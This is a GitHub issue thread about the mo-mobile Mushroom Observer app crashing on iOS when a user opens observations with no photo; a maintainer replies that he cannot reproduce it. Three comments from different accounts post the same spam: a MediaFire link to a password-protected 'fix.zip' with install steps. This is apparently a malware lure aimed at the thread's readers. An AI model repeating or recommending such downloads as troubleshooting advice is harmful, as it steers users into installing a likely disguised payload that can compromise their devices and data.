### ISSUE TITLE
App crashes when clicking No-Photo Observation.

### ISSUE THREAD

**Issue by JoeCohen** [MushroomObserver/mo-mobile#48]
v 1.1.0, iPhone xR, iOS 17.5.1
The app crashed when I clicked either Observation that had a No-Photo icon.
![IMG_4902](https://github.com/user-attachments/assets/8e8c84d9-e0f1-41fe-a275-a465905906ae)

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mo-nathan** [comment]
I'm not able to reproduce this.

**Comment by JoeCohen** [comment]
I'll try reproducing it later today. It may have been the result of installing 1.1.0(1) without deleting 0.x
